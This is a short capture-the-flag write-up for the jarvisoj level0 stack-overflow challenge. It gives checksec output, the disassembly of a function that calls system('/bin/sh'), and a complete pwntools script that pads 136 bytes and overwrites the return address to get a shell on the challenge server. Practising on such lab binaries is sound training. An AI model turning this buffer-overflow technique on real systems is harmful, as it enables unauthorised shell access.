jarvisoj-level0 Writeup

checksec:

# zhailin @ DESKTOP-4OQQP8F in ~/Pwns/ROP/jarvisoj_level0 [12:17:21] C:2
$ checksec level0
[*] '/home/zhailin/Pwns/ROP/jarvisoj_level0/level0'
    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

offset: 136 (found manually with pwndbg)

Ctrl+X to jump into it:

public callsystem
callsystem proc near
; __unwind {
push    rbp
mov     rbp, rsp
mov     edi, offset command ; "/bin/sh"
call    _system
pop     rbp
retn
; } // starts at 400596
callsystem endp

EXP:

from pwn import *

# sh = process('./level0')
sh = remote('node5.buuoj.cn', 26806)

# 136 bytes of padding reach the saved return address; overwrite it with
# the address of callsystem (0x400596, fixed since the binary has no PIE),
# which calls system("/bin/sh").
payload = b'a' * 136 + p64(0x400596)
sh.sendline(payload)
sh.interactive()

https://zer0ptr.github.io/2025/11/23/jarvisoj-level0/
Author: zer0ptr
Published: 2025-11-23